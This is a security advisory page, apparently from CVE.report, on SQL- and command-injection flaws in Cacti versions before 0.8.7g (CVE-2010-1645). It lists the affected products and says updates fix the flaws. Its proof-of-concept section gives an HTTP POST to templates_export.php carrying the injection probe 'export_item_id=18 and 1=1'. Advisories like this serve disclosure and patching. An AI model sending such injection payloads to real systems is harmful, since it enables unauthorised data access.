Cacti Multiple Input Validation Security Vulnerabilities

BID:39639

Info

Cacti Multiple Input Validation Security Vulnerabilities

Bugtraq ID: 39639
Class: Input Validation Error
CVE: CVE-2010-1645
Remote: Yes
Local: No
Published: Apr 22 2010 12:00AM
Updated: Jan 22 2014 08:32AM
Credit: <br>Nahuel Grisolia
Vulnerable: RedHat HPC Solution EL5 5
Planet Technology WSW-2401 0.8.6 h
Planet Technology WSW-2401 0.8.6 g
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
Gentoo Linux
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
Cacti Cacti 0.8.7
Cacti Cacti 0.8.6 f
Cacti Cacti 0.8.6 c
Cacti Cacti 0.8.5 a
Cacti Cacti 0.8.5
Cacti Cacti 0.8.4
Cacti Cacti 0.8.3 a
Cacti Cacti 0.8.3
Cacti Cacti 0.8.2 a
Cacti Cacti 0.8.2
Cacti Cacti 0.8.1
Cacti Cacti 0.8
Cacti Cacti 0.6.7
Cacti Cacti 0.8.7f
Cacti Cacti 0.8.7e
Cacti Cacti 0.8.7d
Cacti Cacti 0.8.7c
Cacti Cacti 0.8.7b
Cacti Cacti 0.8.7a
Cacti Cacti 0.8.6k
Cacti Cacti 0.8.6j
Cacti Cacti 0.8.6i
Not Vulnerable: Cacti Cacti 0.8.7g

Discussion

Cacti Multiple Input Validation Security Vulnerabilities

Cacti is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include SQL-injection and command-injection issues.

Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.

Versions prior to Cacti 0.8.7g are vulnerable.

Exploit / POC

Cacti Multiple Input Validation Security Vulnerabilities

An attacker can exploit these issues via a browser.

The following example data is available:

POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/cacti-0.8.7e/templates_export.php
Cookie: clickedFolder=tree_1%5Etree_1_leaf_7%5E; highlightedTreeviewLink=tree_1_leaf_7;
Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&
save_component_export=1&action=save&x=24&y=12

Solution / Fix

Cacti Multiple Input Validation Security Vulnerabilities

Solution:
Updates are available. Please see the references for more information.


Cacti Cacti 0.8.7d

Cacti Cacti 0.8.7a

MandrakeSoft Enterprise Server 5 x86_64

Cacti Cacti 0.8.6j

MandrakeSoft Enterprise Server 5

Cacti Cacti 0.8.6k

Cacti Cacti 0.8.7b

Cacti Cacti 0.8.7e

MandrakeSoft Corporate Server 4.0

Cacti Cacti 0.8.7c

Cacti Cacti 0.8.6i

Cacti Cacti 0.6.7

Cacti Cacti 0.8

Cacti Cacti 0.8.1

Cacti Cacti 0.8.2 a

Cacti Cacti 0.8.2

Cacti Cacti 0.8.3

Cacti Cacti 0.8.3 a

Cacti Cacti 0.8.4

Cacti Cacti 0.8.5

Cacti Cacti 0.8.5 a

Planet Technology WSW-2401 0.8.6 g

Cacti Cacti 0.8.6 f

Cacti Cacti 0.8.6 c

Planet Technology WSW-2401 0.8.6 h

Cacti Cacti 0.8.7

MandrakeSoft Corporate Server 4.0 x86_64

References

Cacti Multiple Input Validation Security Vulnerabilities

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report